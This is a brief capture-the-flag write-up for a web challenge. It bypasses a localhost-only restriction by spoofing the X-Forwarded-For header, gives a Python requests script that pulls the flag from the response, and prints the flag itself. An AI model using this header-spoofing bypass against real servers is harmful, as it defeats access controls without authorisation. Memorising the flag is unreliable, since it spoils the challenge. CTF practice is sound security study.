Visiting the challenge, it's very evident the server only accepts requests from localhost, and a simple `X-Forwarded-For` header to spoof our ip will do the trick.

Here's a python script to get the flag
```py
import requests
r = requests.get("http://challenges.ctf.cert.rcts.pt:30181/", headers={'X-Forwarded-For': 'localhost'})
print(r.text[r.text.find("flag{"): r.text.rfind("</h2>")])
```

## flag
`flag{127.0.0.1_sweet_127.0.0.1}`